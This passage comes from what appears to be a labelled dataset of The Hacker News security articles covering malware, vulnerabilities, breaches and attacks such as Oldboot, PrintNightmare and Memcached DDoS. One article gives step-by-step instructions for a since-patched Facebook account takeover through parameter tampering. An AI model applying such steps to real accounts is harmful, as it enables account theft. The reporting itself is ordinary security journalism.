the application, open connection for Command and controller. A very unique technique is being used to inject this Trojan into an Android system where an attacker places a component of it into the boot partition of the file system and modify the 'init' script (initialize the operating system) to re-load the malware as you switch on your android. When you start your device, this script loads the Trojan 'imei_chk' (detects it as Android.Oldboot.1) which extract two files libgooglekernel.so (Android.Oldboot.2) and GoogleKernel.apk (Android.Oldboot.1.origin), copy them respectively in /system/lib and /system/app. Android.Oldboot acts as a system service and connects to the command-and-controller server using libgooglekernel.so library and receives commands to download, remove installed apps, and install malicious apps. Since it becomes a part of the boot partition, formatting the device will not solve the problem. The researchers believe that the devices somehow had the malware pre-loaded at the time of shipping from the manufacturer, or was likely distributed inside modified Android firmware. So, users should beware of certain modified Android firmware. Two weeks ago, Some Chinese Security Researchers have also detected a bootkit called 'Oldboot', possibly the same malware or another variant of it. ""Due to the special RAM disk feature of Android devices' boot partition, all current mobile antivirus products in the world can't completely remove this Trojan or effectively repair the system."" ""According to our statistics, as of today, there're more than 500, 000 Android devices infected by this bootkit in China in last six months. The Android malware Android.Oldboot is almost impossible to remove, not even with formatting your device. But if your device is not from a Chinese manufacturer, then chances that you are a victim of it, are very less. This bootkit is not the first of this kind. Two years back, in the month of March we reported, NQ Mobile Security Research Center uncovered the world's first Android bootkit malware called 'DKFBootKit', that replaces certain boot processes and can begin running even before the system is completely booted up. But Android.Oldboot malware is a bit more dangerous because even if you remove all working components of it from your android successfully, the component imei_chk will persist in a protected boot memory area and hence will reinstall itself on next boot and continuously infect the Smartphone. Users are recommended to install apps from authorized stores such as Google Play, disable installation of apps from 'Unknown Sources' and for a better security install a reputed security application. You can also try to re-flash your device with its original ROM. After flashing, the bootkit will be removed. ",Malware New Chrome 0-day Under Active Attacks – Update Your Browser Now,https://thehackernews.com/2020/10/chrome-zeroday-attacks.html,"Attention readers, if you are using Google Chrome browser on your Windows, Mac, or Linux computers, you need to update your web browsing software immediately to the latest version Google released earlier today. Google released Chrome version 86.0.4240.111 today to patch several security high-severity issues, including a zero-day vulnerability that has been exploited in the wild by attackers to hijack targeted computers. Tracked as CVE-2020-15999, the actively exploited vulnerability is a type of memory-corruption flaw called heap buffer overflow in Freetype, a popular open source software development library for rendering fonts that comes packaged with Chrome. The vulnerability was discovered and reported by security researcher Sergei Glazunov of Google Project Zero on October 19 and is subject to a seven-day public disclosure deadline due to the flaw being under active exploitation. Glazunov also immediately reported the zero-day vulnerability to FreeType developers, who then developed an emergency patch to address the issue on October 20 with the release of FreeType 2.10.4. Without revealing technical details of the vulnerability, the technical lead for Google's Project Zero Ben Hawkes warned on Twitter that while the team has only spotted an exploit targeting Chrome users, it's possible that other projects that use FreeType might also be vulnerable and are advised to deploy the fix included in FreeType version 2.10.4. ""While we only saw an exploit for Chrome, other users of freetype should adopt the fix discussed here: https://savannah.nongnu.org/bugs/?59308 -- the fix is also in today's stable release of FreeType 2.10.4,"" Hawkes writes. According to details shared by Glazunov, the vulnerability exists in the FreeType's function ""Load_SBit_Png,"" which processes PNG images embedded into fonts. It can be exploited by attackers to execute arbitrary code just by using specifically crafted fonts with embedded PNG images. ""The issue is that libpng uses the original 32-bit values, which are saved in `png_struct`. Therefore, if the original width and/or height are greater than 65535, the allocated buffer won't be able to fit the bitmap,"" Glazunov explained. Glazunov also published a font file with a proof-of-concept exploit. Google released Chrome 86.0.4240.111 as Chrome's ""stable"" version, which is available to all users, not just to opted-in early adopters, saying that the company is aware of reports that ""an exploit for CVE-2020-15999 exists in the wild,"" but did not reveal further details of the active attacks. Besides the FreeType zero-day vulnerability, Google also patched four other flaws in the latest Chrome update, three of which are high-risk vulnerabilities—an inappropriate implementation bug in Blink, a use after free bug in Chrome's media, and use after free bug in PDFium—and one medium-risk use after free issue in browser's printing function. Although the Chrome web browser automatically notifies users about the latest available version, users are recommended to manually trigger the update process by going to ""Help → About Google Chrome"" from the menu. ",Malware TSMC Chip Maker Blames WannaCry Malware for Production Halt,https://thehackernews.com/2018/08/tsmc-wannacry-ransomware-attack.html,"Taiwan Semiconductor Manufacturing Company (TSMC)—the world's largest makers of semiconductors and processors—was forced to shut down several of its chip-fabrication factories over the weekend after being hit by a computer virus. Now, it turns out that the computer virus outbreak at Taiwan chipmaker was the result of a variant of WannaCry—a massive ransomware attack that wreaked havoc across the world by shutting down hospitals, telecom providers, and many businesses in May 2017. TSMC shut down an entire day of production this weekend after several of its factories systems were halted by a computer virus in the middle of the ramp-up for chips to be used by Apple's future lines of iPhones, which could impact revenue by approx $256 million. According to the semiconductor manufacturer, its computer systems were not direct attacked by any hacker, but instead, were exposed to the malware ""when a supplier installed tainted software without a virus scan"" to TSMC's network. The virus then quickly spread to more than 10,000 machines in some of the company's most advanced facilities, including Tainan, Hsinchu, and Taichung—home to some of the cutting-edge fabrication plants that produce semiconductors for Apple. Although unnamed in its official statement, TSMC reportedly blamed a variant of the 2017 WannaCry ransomware attack for the infection. ""We are surprised and shocked,"" TSMC CEO C.C. Wei said, ""We have installed tens of thousands of tools before, and this is the first time this happened."" Claimed to be developed and spread by North Korea, the WannaCry ransomware shut down hospitals, telecom providers, and many businesses worldwide, infecting hundreds of thousands of computers in over 150 countries within just 72 hours in May 2017. The WannaCry victims included big names like Boeing, Renault, Honda, FedEx and the UK's National Health Service. The WannaCry worm was leveraging an NSA's Windows SMB exploit, known as EternalBlue, leaked by the infamous hacking group Shadow Brokers in its April data dump, along with other Windows exploits. TSMC assured its customers that no confidential information was stolen, and said the company has resumed full operations at its facilities, but shipment delays are expected. However, the chipmaker declined to discuss the implications for Apple, which is said to be ramping up production of 3 new iPhone models for this fall. Besides being Apple's sole supplier of SoC components for iPhones and iPads, TSMC also manufactures processors and other silicon chips for many of the industry's biggest tech companies, including AMD, NVIDIA, Qualcomm, and others. ",Malware LifeLabs Paid Hackers to Recover Stolen Medical Data of 15 Million Canadians,https://thehackernews.com/2019/12/lifelabs-data-breach.html,"LifeLabs, the largest provider of healthcare laboratory testing services in Canada, has suffered a massive data breach that exposed the personal and medical information of nearly 15 million Canadians customers. The company announced the breach in a press release posted on its website, revealing that an unknown attacker unauthorizedly accessed its computer systems last month and stole customers' information, including their: Names Addresses Email addresses Login information Passwords, for their LifeLabs account Dates of birth Health card numbers Lab test results The Toronto-based company discovered the data breach at the end of October, but the press release does not say anything about the identity of the attacker(s) and how they managed to infiltrate its systems. However, LifeLabs admitted it paid an undisclosed amount of ransom to the hackers to retrieve the stolen data, which indicates that the attack might have been carried out using a ransomware style malware with data exfiltration abilities. ""Retrieving the data by making a payment. We did this in collaboration with experts familiar with cyber-attacks and negotiations with cybercriminals,"" the company said while announcing several measures it took to protect its customers' information. LifeLabs also said the majority of affected customers, who used its labs for diagnostic, naturopathic, and genetic tests, reside in British Columbia and Ontario, with relatively few customers in other locations. ""In the case of lab test results, our investigations to date of these systems indicate that there are 85,000 impacted customers from 2016 or earlier located in Ontario; we will be working to notify these customers directly,"" the press release read. ""Our investigation to date indicates any instance of health care information was from 2016 or earlier."" LifeLabs said it immediately involved ""world-class cybersecurity experts"" to isolate and secure the affected computer systems and determine the scope of the cyber attack. The company also stated that it had already notified law enforcement, privacy commissioners, and government partners to investigate the breach incident. While LifeLabs has taken several steps to fix the system issues related to the cyber attack and strengthen its cyber defenses by placing additional safeguards to protect your information, it is also offering one free year of identity theft insurance. ""Any customer who is concerned about this incident can receive one free year of protection that includes dark web monitoring and identity theft insurance,"" LifeLabs said. Since the exposed data includes users' account login information, affected users are strongly advised to change their passwords on the company's website as well as on any other where they have reused the same password. ",Data_Breaches "Memcached DDoS Exploit Code and List of 17,000 Vulnerable Servers Released",https://thehackernews.com/2018/03/memcached-ddos-exploit-code.html,"Two separate proofs-of-concept (PoC) exploit code for Memcached amplification attack have been released online that could allow even script-kiddies to launch massive DDoS attacks using UDP reflections easily. The first DDoS tool is written in C programming language and works with a pre-compiled list of vulnerable Memcached servers. Bonus—its description already includes a list of nearly 17,000 potential vulnerable Memcached servers left exposed on the Internet. Whereas, the second Memcached DDoS attack tool is written in Python that uses Shodan search engine API to obtain a fresh list of vulnerable Memcached servers and then sends spoofed source UDP packets to each server. Last week we saw two record-breaking DDoS attacks—1.35 Tbps hit Github and 1.7 Tbps attack against an unnamed US-based company—which were carried out using a technique called amplification/reflection attack. For those unaware, Memcached-based amplification/reflection attack amplifies bandwidth of the DDoS attacks by a factor of 51,000 by exploiting thousands of misconfigured Memcached servers left exposed on the Internet. Memcached is a popular open source distributed memory caching system, which came into news earlier last week when researchers detailed how hackers could abuse it to launch amplification/reflection DDoS attack by sending a forged request to the targeted Memcached server on port 11211 using a spoofed IP address that matches the victim's IP. A few bytes of the request sent to the vulnerable Memcached server can trigger tens of thousands of times bigger response against the targeted IP address, resulting in a powerful DDoS attack. For a detailed explanation on how Memcached amplification attack works, you can head on to our previous article. Since last week when Memcached has been revealed as a new amplification/reflection attack vector, some hacking groups started exploiting unsecured Memcached servers. But now the situation will get worse with the release of PoC exploit code, allowing anyone to launch massive DDoS attacks, and will not come under control until the last vulnerable Memcached server is patched, or firewalled on port 11211, or completely taken offline. Moreover, cybercriminals groups have already started weaponizing this new DDoS technique to threaten big websites for extorting money. Following last week's DDoS attack on GitHub, Akamai reported its customers received extortion messages delivered alongside the typically ""junk-filled"" attack payloads, asking them for 50 XMR (Monero coins), valued at over $15,000. Reflection/amplification attacks are not new. Attackers have previously used this DDoS attack technique to exploit flaws in DNS, NTP, SNMP, SSDP, Chargen and other protocols in order to maximize the scale of their cyber attacks. To mitigate the attack and prevent Memcached servers from being abused as reflectors, the best option is to bind Memcached to a local interface only or entirely disable UDP support if not in use. ",Cyber_Attack Hackers Exploit VPN to Deploy SUPERNOVA malware on SolarWinds Orion,https://thehackernews.com/2021/04/hackers-exploit-vpn-flaw-to-deploy.html,"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has disclosed details of a new advanced persistent threat (APT) that's leveraging the Supernova backdoor to compromise SolarWinds Orion installations after gaining access to the network through a connection to a Pulse Secure VPN device. ""The threat actor connected to the entity's network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET web shell), and collected credentials,"" the agency said on Thursday. CISA said it identified the threat actor during an incident response engagement at an unnamed organization and found that the attacker had access to the enterprise's network for nearly a year through the use of the VPN credentials between March 2020 and February 2021. Interestingly, the adversary is said to have used valid accounts that had multi-factor authentication (MFA) enabled, rather than an exploit for a vulnerability, to connect to the VPN, thus allowing them to masquerade as legitimate teleworking employees of the affected entity. In December 2020, Microsoft disclosed that a second espionage group may have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems. The intrusions have since been attributed to a China-linked threat actor called Spiral. Unlike Sunburst and other pieces of malware that have been connected to the SolarWinds compromise, Supernova is a .NET web shell implemented by modifying an ""app_web_logoimagehandler.ashx.b6031896.dll"" module of the SolarWinds Orion application. The modifications were made possible by leveraging an authentication bypass vulnerability in the Orion API tracked as CVE-2020-10148, in turn permitting a remote attacker to execute unauthenticated API commands. An investigation into the incident is ongoing. In the meantime, CISA is recommending organizations to implement MFA for privileged accounts, enable firewalls to filter unsolicited connection requests, enforce strong password policies, and secure Remote Desktop Protocol (RDP) and other remote access solutions. ",Cyber_Attack Buffer Overflow vulnerability in VLC media player,https://thehackernews.com/2013/02/buffer-overflow-vulnerability-in-vlc.html,"VideoLAN recently published a security advisory warning of a buffer overflow vulnerability in versions 2.0.5 and earlier of VLC Media Player, which might be exploited to execute arbitrary code. This vulnerability was reported by Debasish Mandal. The vulnerability is caused due to an error in the ""DemuxPacket()"" function (modules/demux/asf/asf.c) when processing ASF files and can be exploited to cause a buffer overflow via a specially crafted ASF file. To exploit the vulnerability, a user must explicitly open a specially crafted ASF movie. Successful exploitation may allow execution of arbitrary code, but requires tricking a user into opening a malicious file. VideoLAN advises users to refrain from opening files from untrusted locations and to disable the VLC browser plug-ins until the issue is patched. A patch will be included in VLC 2.0.6, the next version of the media player, which is only available for testing purposes at the moment. ",Vulnerability Researchers Leak PoC Exploit for a Critical Windows RCE Vulnerability,https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html,"A proof-of-concept (PoC) exploit related to a remote code execution vulnerability affecting Windows Print Spooler and patched by Microsoft earlier this month was briefly published online before being taken down. Identified as CVE-2021-1675, the security issue could grant remote attackers full control of vulnerable systems. Print Spooler manages the printing process in Windows, including loading the appropriate printer drivers and scheduling the print job for printing, among others. Print Spooler flaws are concerning, not least because of the wide attack surface, but also owing to the fact that it runs at the highest privilege level and is capable of dynamically loading third-party binaries. The Windows maker addressed the vulnerability as part of its Patch Tuesday update on June 8, 2021. But almost two weeks later, Microsoft revised the flaw's impact from an elevation of privilege to remote code execution (RCE) as well as upgraded the severity level from Important to Critical. ""Either the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or remotely (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., tricking a legitimate user into opening a malicious document),"" Microsoft said in its advisory. Things took a turn when Chinese security firm QiAnXin earlier this week disclosed it was able to find the ""right approaches"" to leverage the flaw, thereby demonstrating a successful exploitation to achieve RCE. Although the researchers refrained from sharing additional technical specifics, Hong Kong-based cybersecurity company Sangfor published what's an independent deep-dive of the same vulnerability to GitHub, along with a fully working PoC code, where it remained publicly accessible before it was taken offline a few hours later. Sangfor codenamed the vulnerability ""PrintNightmare."" ""We deleted the PoC of PrintNightmare. To mitigate this vulnerability, please update Windows to the latest version, or disable the Spooler service,"" tweeted Sangfor's Principal Security Researcher Zhiniang Peng. The findings are expected to be presented at the Black Hat USA conference next month. Windows Print Spooler has long been a source of security vulnerabilities, with Microsoft fixing at least three issues — CVE-2020-1048, CVE-2020-1300, and CVE-2020-1337 — in the past year alone. Notably, a flaw in the service was also abused to gain remote access and propagate the Stuxnet worm in 2010 targeting Iranian nuclear installations. Update — There are now indications that the fix released by Microsoft for the critical remote code execution vulnerability in the Windows Print spooler service in June does not completely remediate the root cause of the bug, according to the CERT Coordination Center, raising the possibility that it's a zero-day flaw in need of a patch. ""While Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675,"" CERT/CC's Will Dormann said in a vulnerability note published Wednesday. It's worth noting that the successful exploitation of CVE-2021-1675 could open the door to complete system takeover by remote adversaries. We have reached out to Microsoft for comment, and we will update the story when we hear back. In light of the latest disclosure, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) is recommending that administrators ""disable the Windows Print spooler service in Domain Controllers and systems that do not print."" ",Vulnerability Personal Data of 50 Million Turkish Citizens Leaked Online,https://thehackernews.com/2016/04/personal-data-leaked.html,"Personal details of nearly 50 Million Turkish citizens, including the country's President Recep Tayyip Erdogan, have been compromised and posted online in a massive security breach. A database, which contains 49,611,709 records, appeared on the website of an Icelandic group on Monday, offering download links to anyone interested. If confirmed, the data breach would be one of the biggest public breaches of its kind, effectively putting two-thirds of the Nation's population at risk of identity theft and fraud. However, The Associated Press (AP) reported on Monday that it was able to partially verify the authenticity of 8 out of 10 non-public Turkish ID numbers against the names in the data leak. 50 Million Turkish Citizens' Personal Data leaked Online The leaked database (about 6.6 GB file) contains the following information: First and last names National identifier numbers (TC Kimlik No) Gender City of birth Date of birth Full address ID registration city and district User's mother and Father's first names To prove the authenticity of the data, the group of hackers published the personal details of Turkish President Recep Tayyip Erdogan, along with his predecessor Abdullah Gul, and Prime Minister Ahmet Davutoglu. The attack seems to be politically motivated, as the hackers wrote the following message on the database's front page, featuring Erdogan's profile: ""Who would have imagined that backwards ideologies, cronyism and rising religious extremism in Turkey would lead to a crumbling and vulnerable technical infrastructure?"" Lessons Posted by Hackers Besides the leaked database, the hackers also provided some lessons to learn from this leak. Under the heading Lessons for Turkey, the hackers wrote: 'Bit shifting isn't encryption,' referring to the fact that the data was improperly protected. 'Index your database. We had to fix your sloppy DB work.' 'Putting a hardcoded password on the UI hardly does anything for security,' though the hackers didn't specify in what UI. 'Do something about Erdogan! He is destroying your country beyond recognition.' Under the heading Lessons for the United States, the hackers addressed US citizens, asking them not to elect Republican front-runner Donald Trump since he 'sounds like he knows even less about running a country than Erdogan does.' Links to Download the Database The database is available online on a Finland-based server. Though the source of the leaked data is currently unknown, it is likely from a Turkish public administration office that deals with users' personal information. If the authenticity of all 50 Million records gets verified, the breach will be the biggest leaks after the one that occurred in U.S. government's Office of Personnel Management (OPM) in April 2015 that… ...compromised the personal information of over 22 Million U.S. federal employees, contractors, retirees and others, and exposed Millions of sensitive and classified documents. ",Data_Breaches Desktop Viruses Coming to Your TV and Connected Home Appliances,https://thehackernews.com/2014/04/Viruses-Malware-hacking-Internet-of-things-TV.html,"Smart Devices are growing at an exponential rate and so are the threats to them. After your Computers, Servers, Routers, Mobiles and Tablets, now hackers are targeting your Smart TVs, warns Eugene Kaspersky the co-founder and chief executive of Kaspersky Lab. As the increase in the manufactures of Smart TVs by different companies, it could be estimated that by 2016, over 100 million TVs are expected to be connected to the Internet and in the time it may rise as a profitable fruit for the malware authors and cyber criminals to exploit these devices. The 48 year-old Eugene Kaspersky, one of the world's top technology security experts, has thrown light on the future of Computer Security and warned that Internet of Things (IoT) such as TVs, Refrigerators, Microwave or dishwashers will necessarily bring undesirable cyber threats to your home environment, because any device connected to the Internet is vulnerable and can be infected. ""The threats will diversify to mobile phones and to the home environment, such as through televisions, which are now connected to the Internet,"" he said in an interview with the Telegraph. The Internet of Things is said to be the next evolutionary step in our connected world that has been already become a major target for cyber criminals. We have reported before that how 100,000 Refrigerators and other smart household appliances were compromised by hackers to send out 750,000 malicious spam emails; A Linux worm 'Linux.Darlloz' is hijacking Home Routers, Set-top boxes, Security Cameras, printers to mine Crypto Currencies like Bitcoin. So, the malicious software that already caused damages to your desktops, laptops and targeted your mobile devices till now, is ready to cause harm to your Smart TVs and other Internet connected smart devices. Kaspersky said his company's global research and development headquarters in Moscow is receiving around 315,000 suspicious activity reports on daily basis, that has doubled over the past year. The threats might crawl to the new sectors other than mobile phones and computer systems. ""There are millions of attacks a year on Microsoft Windows, thousands on mobile phones, mostly on Android, and dozens on Apple's iOS. But more and more engineers are developing software for Android,"" he said. But according to him ""technically it is possible to infect millions of devices"" because all devices are vulnerable and it is very much possible to see cyber criminals developing viruses for iOS devices. The fact that I really like what he says, ""What's the difference been a TV and a computer? A bigger screen and a remote control. It has Android inside and memory chips and Internet connections. That's all."" Well said! He also warned users that as the Internet of Things (IoTs) increases, users need to have top security packages installed on their devices. ""It's just a question of time. We already have a product for mobile and we have a prototype for TV so we are ready to address this issue when new malware for television is released by criminals."" In the last few years, this emerging domain for the Internet of Things has been attracting the significant interest, and will continue for the years to come. It would be a $20 Trillion Market over the next several years, but Security and privacy are the key issues for such applications, and still face some enormous challenges. ",Malware Facebook hacked in Zero-Day Attack,https://thehackernews.com/2013/02/facebook-hacked-in-zero-day-attack.html,"Facebook operator of the largest social network with more than 1 billion members, said on Friday it had been the target of an unidentified hacker group, but that no user information was compromised during the attack. The attack occurred when a handful of the company's employees visited a developer's compromised website, which led to malware being installed on their laptops. 'Last month, Facebook Security discovered that our systems had been targeted in a sophisticated attack,' read the statement, despite the laptops being 'fully-patched and running up-to-date anti-virus software.' Reports say Facebook knew about the attacks, which likely exploited a zero-day Java software flaw, well before the announcement. ""We are working continuously and closely with our own internal engineering teams, with security teams at other companies, and with law enforcement authorities to learn everything we can about the attack, and how to prevent similar incidents in the future,"" Facebook said on its website. Facebook was not alone in this attack, Twitter social network, said earlier this month that it had been hacked, and that approximately 2,50,000 user accounts were potentially compromised, with attackers gaining access to information including user names and email addresses. ",Malware Backdoored PhpMyAdmin distributed at SourceForge site,https://thehackernews.com/2012/09/backdoored-phpmyadmin-distributed-at.html,"A security issue has been reported in phpMyAdmin, which can be exploited by malicious people to compromise a vulnerable system. The security issue is caused due to the distribution of a compromised phpMyAdmin source code package containing a backdoor, which can be exploited to e.g. execute arbitrary PHP code. One of the SourceForge.net mirrors, namely cdnetworks-kr-1, was being used to distribute a modified archive of phpMyAdmin, which includes a backdoor. This backdoor is located in file server_sync.php and allows an attacker to remotely execute PHP code. Another file, js/cross_framing_protection.js, has also been modified. SourceForge.Net is the world's largest open source software development website. A very large impact on the domestic users with this incident. The vulnerability has been cataloged as being a critical one. A screenshot as shown of a system containing a malicious backdoor that was snuck into the open-source phpMyAdmin package. On official website in issue ""PMASA-2012-5"" developers said ""We currently know only about phpMyAdmin-3.5.2.2-all-languages.zip being affected,"". It's not the first time a widely used open-source project has been hit by a breach affecting the security of its many downstream users. In June of last year, WordPress required all account holders on WordPress.org to change their passwords following the discovery that hackers contaminated it with malicious software. ",Malware Hacking Facebook Account with just a text message,https://thehackernews.com/2013/06/Hacking-Facebook-account-hack-tool.html,"Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ? Today we are going to explain you that how a UK based Security Researcher, ""fin1te"" is able to hack any Facebook account within a minute by doing one SMS. Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username. According to hacker, the loophole was in phone number linking process, or in technical terms, at file /ajax/settings/mobile/confirm_phone.php This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to. As attacker, follow these steps to execute hack: Change value of profile_id to the Victim's profile_id value by tampering the parameters. Send the letter F to 32665, which is Facebook's SMS shortcode in the UK. You will receive an 8 character verification code back. Enter that code in the box or as confirmation_code parameter value and Submit the form. Facebook will accept that confirmation code and attacker's mobile number will be linked to victim's Facebook profile. In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim's account. Attacker now can get password recovery code to his own mobile number which is linked to victim's account using above steps. Enter the code and Reset the password! Facebook no longer accepting the profile_id parameter from the user end after receiving the bug report from the hacker. In return, Facebook paying $20,000 to fin1te as Bug Bounty. ",Vulnerability These Top 7 Brutal Cyber Attacks Prove 'No One is Immune to Hacking' — Part I,https://thehackernews.com/2015/09/top-cyber-attacks-1.html,"If you believe that your organization is not at real risk of cyber attack, then you are absolutely wrong. Incidents of massive data breaches, advanced cyber attacks coming from China, groups like Syrian Electronic Army, Hacking Point of Sale machines at retailers such as Target have splashed across the news in the last one year. Whether a Government Agency or Private Company, Small or a Large Tech Company.... ...It's no secret that No one is Immune to Cyber Attacks. This article is the first in a two-part series from The Hacker News, listing first four out of Top 7 Brutal Cyber Attacks. And here we go... #1 ""Hacking Team"" Data Breach Hacking Team, the controversial spyware company, recently been hacked by some unidentified hackers that exposed over 400 gigabytes of its internal sensitive data on the Internet. Milan (Italy) based IT firm 'Hacking Team' sells intrusion and surveillance software solutions to Governments and Law Enforcement agencies worldwide. Hacking Team is infamous for its commercial surveillance tool named as Remote Control System (RCS), which is capable of spying activities and remotely accessing target system's microphone and camera. However, sometimes even Hackers get Hacked! So same happened with Hacking Team when hackers not only defaced Hacking Team's own Twitter account but also leaked: Executive Emails Source codes for Hacking and Spyware Tools Zero-day exploits, including for Flash, Internet Explorer Government client list with date of purchase and amount paid …Marking the attack as one of the biggest cyber attacks on any Company. One of the aspects of the data breach showed the lack of protection implementations within the organization and using weak passwords. #2 Ashley Madison Data Breach TIP: No website can guarantee privacy of your identity, Credit card details, personal photos or any other information. [Read more] Two months ago, Toronto-based Ashley Madison website, popular as an online Married Dating portal for extramarital affairs with the tagline ""Life is Short. Have an Affair,"" was hacked by 'The Impact Team'. Hackers allegedly gained access to millions of its customers information database and posted 10GB of personal data for its tens of Millions of customers, including their names and email addresses. Frequently followed by another leak, where hackers released another 20GB of company's internal data, including personal e-mails from the CEO of Ashley Madison parent company Avid Life, Noel Biderman, along with the source code for its website and mobile apps. The breach came just two months after an attack on another scandalous site, Adult Friend Finder where again millions of people's very personal data were left exposed on the Internet. The Ashley Madison and Adult Friend Finder hacking cases raise serious questions about what these dating websites are doing to ensure the security of their users' personal information. #3 The Sony Pictures Hack Remember last year when you were able to download and watch unreleased movies of Sony Pictures Entertainment? Annie, Mr. Turner, Still Alice, To Write Love On Her Arms, and Brad Pitt's ""Fury""... ...were leaked online on torrent websites, following a massive cyber attack on Sony Pictures last year by the Guardians of Peace (GOP) hacking group. The hack wasn't limited to unreleased movies — the unknown hackers leaked about 200 gigabytes of confidential data belonging to Sony Pictures from movie scripts to sensitive employees data, celebrity's' phone numbers and their travel aliases, making it the most severe hack in the History. The massive cyber attack on the company was in response to the release of ""The Interview"" — a controversial North Korean-baiting film, where hackers threatened 9/11 Type attack at Theaters showing this movie. As a result, Sony had to shut down its services for weeks. However, it struggled to solve the issue by pulling ""The Interview"" from theaters and eventually putting it up on Netflix. But, things have not changed much for Sony. This was the second time Sony was targeted, and the intensity of the attack was such that even after taking the best measures, a subsequent amount of the company's data was leaked to WikiLeaks. #4 'Fappening' and 'Snappening' When a surge of Nude Photos of Celebrities were leaked and went viral in August of 2014, the Internet had a meltdown. Unknown Hacker was able to break into third-party applications connected to services like Facebook, Twitter, Instagram and Apple's iCloud that led to a major incident known as ""The Fappening"". The Fappening mainly attacked female celebrities and leaked very private photographs of them, including Jennifer Lawrence, Kim Kardashian, Kirsten Dunst, Avril Lavigne and many others. Within a month of ""The Fappening,"" another similar incident called ""The Snappening"" happened that leaked more than 100,000 nude videos and images of the Snapchat users. In The Fappening, the Naked Pictures were allegedly retrieved due to a ""brute force"" security flaw in Apple's iCloud file storage service. However, Apple denied it. In case of The Snappening, Snapchat's servers were not breached. Instead, the nude pictures of users were compromised due to third-party apps used to send and receive Snaps. However, both the incidents marked as the biggest hacks of one of its kind. Further Read: Part II — Top 7 Brutal Cyber Attacks Proves that No One is Immune to Hacking. ",Cyber_Attack TalkTalk Hack: Police Arrest Second Teenager in London,https://thehackernews.com/2015/10/talktalk-hack.html,"British Police have arrested a second teenage boy in relation to the major hack on the servers of UK-based telco 'TalkTalk' last week. On Monday, a 15-year-old boy (first arrest) from County Antrim, Northern Ireland, was arrested in connection with the TalkTalk Data Breach. On Thursday, The Metropolitan Police Cyber Crime Unit (MPCCU) arrested this second unnamed 16-year-old boy from Feltham in west London on suspicion of Computer Misuse Act offences. Latest TalkTalk Data breach put the Bank details and Personally Identifiable Information (PII) of millions of customers at risk, including: Nearly 21,000 Bank Accounts Almost 28,000 obscured Credit and Debit card details Less than 15,000 customer dates of birth Names, Email Addresses, and Phone Numbers of 1.2 Million Customers TalkTalk has confessed that ""Not all of the data was encrypted""... yeah, its' too bad. However, ""Investigations so far show that the information that may have been accessed is not enough on its own to take money from your bank account,"" the company claimed. ""Starting today, we are writing to all customers who have been affected by this to let them know what information has been accessed."", TalkTalk said in a statement. As advised earlier, the affected TalkTalk customers are highly recommended to change their passwords as soon as possible and keep an eye on their bank accounts over the next few months. ",Data_Breaches Thousands of High-Risk Vulnerabilities Found in NOAA Satellite System,https://thehackernews.com/2014/09/thousands-of-high-risk-vulnerabilities_9.html,"The informational systems that the National Oceanic and Atmospheric Administration (NOAA) run are loaded with several critical vulnerabilities that could leave it vulnerable to cyber attacks. According to the findings of an audit recently conducted by the Department of Commerce's Office of the Inspector General (OIG), the Joint Polar Satellite System's (JPSS) ground system is vulnerable to a large number of high-risk vulnerabilities. The JPSS ground system is used to collect data from several polar-orbiting weather satellites, and distribute the information to users worldwide. This system also provides command, control and data processing for current and future weather satellites. But, the vulnerabilities identified in the system could impair technology controlling the United States' next generation of polar-orbiting environmental satellites. ""Our analysis of the JPSS program's assessments of system vulnerabilities found that, since FY 2012, the number of high-risk vulnerabilities in the system had increased by two-thirds7 despite recent efforts the program has taken to remediate these vulnerabilities,"" according to a memorandum from Allen Crawley, assistant inspector general for systems acquisition and IT security, to Kathryn Sullivan, under secretary of commerce for oceans and atmosphere and NOAA administrator. The system is considered to be a ""High Impact"" IT system for which the loss of confidentiality, integrity, or availability could be expected to have a severe or catastrophic effect on organizational operations, organizational assets or individuals. The audit, which analyzed NOAA's IT security program, showed an unbelievable picture. In the recent audit, the report showed that the number of High-Risk vulnerabilities rose from 14,486 in the first quarter of the fiscal year (FY) 2012 to 23,868 in the second quarter of FY 2014. ""If exploited, these [high-risk] vulnerabilities may make it possible for attackers to significantly disrupt the JPSS mission of providing critical data used in weather forecasting and climate monitoring,"" Crawley wrote in the memorandum. Some of the vulnerabilities found are difficult to patch, but many of the identified high-risk vulnerabilities can be fixed easily by just making only minor modification to the current system. As more than 9,100 instances of software versions include the following issues: Out of date software or lacking security patches Insecurely configured software Unnecessary user privileges Moreover, adjustments can be made to more than 3,600 instances of password and auditing settings that are incorrectly configured and do not meet JPSS policy standards, as well as to unnecessary software applications that need to be removed or disabled. The system even included the ""Heartbleed"" vulnerability, which has since been remediated. Heartbleed is one of the biggest Internet vulnerabilities in recent history that left large number of cryptographic keys and private data such as usernames, passwords, and credit card numbers, from the most important sites and services on the Internet open for hackers. ""In response to our draft memorandum, NOAA concurred with our recommendations,"" Crawley wrote. ""NOAA indicated that it had already implemented [a] recommendation [to use system update processes for quickly applying critical patches], explaining that it remediated the Heartbleed vulnerability during the third quarter of FY 2014."" The issue is critical because numerous of vulnerabilities within the JPSS software are publicly available from years and , furthermore, tools are also available on the internet that can be used to exploit many of the vulnerabilities. ",Vulnerability Severe Bug Discovered in Signal Messaging App for Windows and Linux,https://thehackernews.com/2018/05/signal-messenger-vulnerability.html,"Security researchers have discovered a severe vulnerability in the popular end-to-end encrypted Signal messaging app for Windows and Linux desktops which could allow remote attackers to execute malicious code on recipients system just by sending a message—without requiring any user interaction. Discovered by Alfredo Ortega, a software security consultant from Argentina, the vulnerability was announced on Twitter just a few hours ago with a proof-of-concept video, demonstrating how a javascript payload sent over Signal for desktop app successfully got executed on the recipient's system. Although technical details of the vulnerability have not been revealed as of 